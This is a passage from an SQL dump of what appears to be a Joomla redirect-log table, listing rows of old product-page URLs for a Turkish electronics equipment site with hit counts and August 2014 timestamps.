00:00:00',301),(3002,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',6,0,'2014-08-15 10:25:45','0000-00-00 00:00:00',301),(3003,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',4,0,'2014-08-15 10:26:28','0000-00-00 00:00:00',301),(3004,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',5,0,'2014-08-15 10:42:10','0000-00-00 00:00:00',301),(3005,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',2,0,'2014-08-15 10:47:26','0000-00-00 00:00:00',301),(3006,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',7,0,'2014-08-15 10:54:25','0000-00-00 00:00:00',301),(3007,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118','','','',4,0,'2014-08-15 10:58:30','0000-00-00 00:00:00',301),(3008,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',9,0,'2014-08-15 10:59:32','0000-00-00 00:00:00',301),(3009,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default','','','',3,0,'2014-08-15 10:59:54','0000-00-00 00:00:00',301),(3010,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',10,0,'2014-08-15 11:01:17','0000-00-00 00:00:00',301),(3011,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',2,0,'2014-08-15 11:10:54','0000-00-00 00:00:00',301),(3012,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',10,0,'2014-08-15 11:24:33','0000-00-00 00:00:00',301),(3013,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',10,0,'2014-08-15 11:24:41','0000-00-00 00:00:00',301),(3014,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',10,0,'2014-08-15 11:24:49','0000-00-00 00:00:00',301),(3015,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',10,0,'2014-08-15 11:25:13','0000-00-00 00:00:00',301),(3016,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',10,0,'2014-08-15 11:25:19','0000-00-00 00:00:00',301),(3017,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',10,0,'2014-08-15 11:25:35','0000-00-00 00:00:00',301),(3018,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',10,0,'2014-08-15 11:25:52','0000-00-00 00:00:00',301),(3019,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',1,0,'2014-08-15 11:26:13','0000-00-00 00:00:00',301),(3020,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',10,0,'2014-08-15 11:26:44','0000-00-00 00:00:00',301),(3021,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',126,0,'2014-08-15 11:34:32','0000-00-00 00:00:00',301),(3022,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',4,0,'2014-08-15 11:50:23','0000-00-00 00:00:00',301),(3023,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',3,0,'2014-08-15 11:50:28','0000-00-00 00:00:00',301),(3024,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',2,0,'2014-08-15 11:58:03','0000-00-00 00:00:00',301),(3025,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',4,0,'2014-08-15 11:58:25','0000-00-00 00:00:00',301),(3026,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',4,0,'2014-08-15 11:59:26','0000-00-00 00:00:00',301),(3027,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',4,0,'2014-08-15 12:01:36','0000-00-00 00:00:00',301),(3028,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27','','','',1,0,'2014-08-15 12:02:13','0000-00-00 00:00:00',301),(3029,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr','','','',8,0,'2014-08-15 12:11:18','0000-00-00 00:00:00',301),(3030,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',3,0,'2014-08-15 12:24:26','0000-00-00 00:00:00',301),(3031,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',5,0,'2014-08-15 12:29:39','0000-00-00 00:00:00',301),(3032,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',3,0,'2014-08-15 12:30:27','0000-00-00 00:00:00',301),(3033,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',3,0,'2014-08-15 12:42:21','0000-00-00 00:00:00',301),(3034,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',6,0,'2014-08-15 12:44:04','0000-00-00 00:00:00',301),(3035,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=tr','','','',8,0,'2014-08-15 12:48:27','0000-00-00 00:00:00',301),(3036,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',91,0,'2014-08-15 12:48:52','0000-00-00 00:00:00',301),(3037,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',6,0,'2014-08-15 12:58:34','0000-00-00 00:00:00',301),(3038,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',1,0,'2014-08-15 13:15:36','0000-00-00 00:00:00',301),(3039,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',2,0,'2014-08-15 13:16:07','0000-00-00 00:00:00',301),(3040,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133','','','',1,0,'2014-08-15 13:16:58','0000-00-00 00:00:00',301),(3041,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124','','','',2,0,'2014-08-15 13:25:38','0000-00-00 00:00:00',301),(3042,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',3,0,'2014-08-15 13:32:14','0000-00-00 00:00:00',301),(3043,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124','','','',1,0,'2014-08-15 13:33:57','0000-00-00 00:00:00',301),(3044,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',1,0,'2014-08-15 13:38:23','0000-00-00 00:00:00',301),(3045,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=54%3Apcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',4,0,'2014-08-15 13:41:35','0000-00-00 00:00:00',301),(3046,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',3,0,'2014-08-15 13:45:24','0000-00-00 00:00:00',301),(3047,'http://www.3s-technologies.com.tr/index.php/en//images/stories/food.gif','','','',1,0,'2014-08-15 13:46:20','0000-00-00 00:00:00',301),(3048,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=tr','','','',3,0,'2014-08-15 13:48:34','0000-00-00 00:00:00',301),(3049,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',2,0,'2014-08-15 13:50:01','0000-00-00 00:00:00',301),(3050,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',12,0,'2014-08-15 13:52:01','0000-00-00 00:00:00',301),(3051,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',1,0,'2014-08-15 13:56:19','0000-00-00 00:00:00',301),(3052,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default','','','',7,0,'2014-08-15 14:03:28','0000-00-00 00:00:00',301),(3053,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',1,0,'2014-08-15 14:09:45','0000-00-00 00:00:00',301),(3054,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',8,0,'2014-08-15 14:09:55','0000-00-00 00:00:00',301),(3055,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',3,0,'2014-08-15 14:24:06','0000-00-00 00:00:00',301),(3056,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',1,0,'2014-08-15 14:49:44','0000-00-00 00:00:00',301),(3057,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',4,0,'2014-08-15 14:50:55','0000-00-00 00:00:00',301),(3058,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',3,0,'2014-08-15 15:13:16','0000-00-00 00:00:00',301),(3059,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130','','','',1,0,'2014-08-15 15:14:39','0000-00-00 00:00:00',301),(3060,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',7,0,'2014-08-15 15:43:44','0000-00-00 00:00:00',301),(3061,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',5,0,'2014-08-15 15:46:08','0000-00-00 00:00:00',301),(3062,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',12,0,'2014-08-15 15:50:31','0000-00-00 00:00:00',301),(3063,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',3,0,'2014-08-15 15:54:14','0000-00-00 00:00:00',301),(3064,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',11,0,'2014-08-15 16:05:13','0000-00-00 00:00:00',301),(3065,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',1,0,'2014-08-15 16:11:25','0000-00-00 00:00:00',301),(3066,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=tr','','','',4,0,'2014-08-15 16:15:58','0000-00-00 00:00:00',301),(3067,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',5,0,'2014-08-15 16:17:06','0000-00-00 00:00:00',301),(3068,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',2,0,'2014-08-15 16:51:49','0000-00-00 00:00:00',301),(3069,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161','','','',1,0,'2014-08-15 17:01:39','0000-00-00 00:00:00',301),(3070,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=en','','','',8,0,'2014-08-15 17:36:20','0000-00-00 00:00:00',301),(3071,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',3,0,'2014-08-15 17:38:54','0000-00-00 00:00:00',301),(3072,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',1,0,'2014-08-15 18:14:39','0000-00-00 00:00:00',301),(3073,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',2,0,'2014-08-15 18:26:12','0000-00-00 00:00:00',301),(3074,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',1,0,'2014-08-15 18:55:47','0000-00-00 00:00:00',301),(3075,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',2,0,'2014-08-15 19:26:31','0000-00-00 00:00:00',301),(3076,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',1,0,'2014-08-15 19:48:35','0000-00-00 00:00:00',301),(3077,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',1,0,'2014-08-15 19:48:38','0000-00-00 00:00:00',301),(3078,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',5,0,'2014-08-15 19:58:30','0000-00-00 00:00:00',301),(3079,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=71&Itemid=79','','','',2,0,'2014-08-15 20:03:39','0000-00-00 00:00:00',301),(3080,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',2,0,'2014-08-15 20:14:12','0000-00-00 00:00:00',301),(3081,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',1,0,'2014-08-15 20:20:27','0000-00-00 00:00:00',301),(3082,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=95&lang=tr','','','',2,0,'2014-08-15 20:33:10','0000-00-00 00:00:00',301),(3083,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',6,0,'2014-08-15 20:45:37','0000-00-00 00:00:00',301),(3084,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',3,0,'2014-08-15 21:18:28','0000-00-00 00:00:00',301),(3085,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79','','','',1,0,'2014-08-15 21:24:16','0000-00-00 00:00:00',301),(3086,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79','','','',1,0,'2014-08-15 21:29:28','0000-00-00 00:00:00',301),(3087,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',2,0,'2014-08-15 22:17:35','0000-00-00 00:00:00',301),(3088,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',4,0,'2014-08-15 22:30:55','0000-00-00 00:00:00',301),(3089,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155','','','',4,0,'2014-08-15 22:48:51','0000-00-00 00:00:00',301),(3090,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',8,0,'2014-08-15 23:16:33','0000-00-00 00:00:00',301),(3091,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',2,0,'2014-08-15 23:17:47','0000-00-00 00:00:00',301),(3092,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',2,0,'2014-08-15 23:26:19','0000-00-00 00:00:00',301),(3093,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr&limitstart=10','','','',3,0,'2014-08-15 23:31:46','0000-00-00 00:00:00',301),(3094,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default','','','',4,0,'2014-08-15 23:44:14','0000-00-00 00:00:00',301),(3095,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',4,0,'2014-08-15 23:45:42','0000-00-00 00:00:00',301),(3096,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',4,0,'2014-08-15 23:55:14','0000-00-00 00:00:00',301),(3097,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57','','','',5,0,'2014-08-15 23:56:42','0000-00-00 00:00:00',301),(3098,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',3,0,'2014-08-16 00:11:55','0000-00-00 00:00:00',301),(3099,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',1,0,'2014-08-16 00:22:26','0000-00-00 00:00:00',301),(3100,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',4,0,'2014-08-16 00:34:05','0000-00-00 00:00:00',301),(3101,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=113&Itemid=125&lang=en','','','',1,0,'2014-08-16 01:15:33','0000-00-00 00:00:00',301),(3102,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/using-joomla/extensions/components/content-component/index.php/welcome.html','','','',17,0,'2014-08-16 02:08:53','0000-00-00 00:00:00',301),(3103,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/welcome.html','','','',59,0,'2014-08-16 02:09:23','0000-00-00 00:00:00',301),(3104,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127','','','',2,0,'2014-08-16 02:16:15','0000-00-00 00:00:00',301),(3105,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/parks-home','','','',14,0,'2014-08-16 02:29:16','0000-00-00 00:00:00',301),(3106,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',88,0,'2014-08-16 02:50:52','0000-00-00 00:00:00',301),(3107,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',40,0,'2014-08-16 03:09:02','0000-00-00 00:00:00',301),(3108,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',4,0,'2014-08-16 03:26:34','0000-00-00 00:00:00',301),(3109,'http://3s-technologies.com.tr/index.php/en/component/content/category/81-english-uk/english-content','','','',7,0,'2014-08-16 03:31:11','0000-00-00 00:00:00',301),(3110,'http://3s-technologies.com.tr/index.php/tr/component/content/category/80-turkish-tr/turkish-content','','','',3,0,'2014-08-16 03:32:05','0000-00-00 00:00:00',301),(3111,'http://www.3s-technologies.com.tr/index.php/tr/component/content/category/80-turkish-tr/turkish-content','','','',50,0,'2014-08-16 03:33:00','0000-00-00 00:00:00',301),(3112,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37','','','',4,0,'2014-08-16 03:41:22','0000-00-00 00:00:00',301),(3113,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',2,0,'2014-08-16 03:44:55','0000-00-00 00:00:00',301),(3114,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',2,0,'2014-08-16 04:23:20','0000-00-00 00:00:00',301),(3115,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',10,0,'2014-08-16 04:47:40','0000-00-00 00:00:00',301),(3116,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',8,0,'2014-08-16 05:13:57','0000-00-00 00:00:00',301),(3117,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en','','','',5,0,'2014-08-16 05:22:46','0000-00-00 00:00:00',301),(3118,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr&limitstart=5','','','',3,0,'2014-08-16 05:26:23','0000-00-00 00:00:00',301),(3119,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',7,0,'2014-08-16 05:37:38','0000-00-00 00:00:00',301),(3120,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',1,0,'2014-08-16 05:48:53','0000-00-00 00:00:00',301),(3121,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',2,0,'2014-08-16 05:52:50','0000-00-00 00:00:00',301),(3122,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164','','','',3,0,'2014-08-16 06:15:57','0000-00-00 00:00:00',301),(3123,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',3,0,'2014-08-16 06:17:02','0000-00-00 00:00:00',301),(3124,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',11,0,'2014-08-16 06:27:00','0000-00-00 00:00:00',301),(3125,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',5,0,'2014-08-16 06:51:57','0000-00-00 00:00:00',301),(3126,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',3,0,'2014-08-16 07:08:32','0000-00-00 00:00:00',301),(3127,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',10,0,'2014-08-16 07:38:52','0000-00-00 00:00:00',301),(3128,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143','','','',3,0,'2014-08-16 08:09:49','0000-00-00 00:00:00',301),(3129,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',4,0,'2014-08-16 08:18:19','0000-00-00 00:00:00',301),(3130,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',2,0,'2014-08-16 08:25:15','0000-00-00 00:00:00',301),(3131,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',14,0,'2014-08-16 08:39:03','0000-00-00 00:00:00',301),(3132,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',10,0,'2014-08-16 08:51:41','0000-00-00 00:00:00',301),(3133,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',3,0,'2014-08-16 08:54:25','0000-00-00 00:00:00',301),(3134,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',2,0,'2014-08-16 08:59:42','0000-00-00 00:00:00',301),(3135,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',3,0,'2014-08-16 09:02:37','0000-00-00 00:00:00',301),(3136,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',6,0,'2014-08-16 09:04:36','0000-00-00 00:00:00',301),(3137,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',2,0,'2014-08-16 09:08:51','0000-00-00 00:00:00',301),(3138,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=tr','','','',1,0,'2014-08-16 09:16:08','0000-00-00 00:00:00',301),(3139,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',6,0,'2014-08-16 09:24:53','0000-00-00 00:00:00',301),(3140,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',3,0,'2014-08-16 09:33:48','0000-00-00 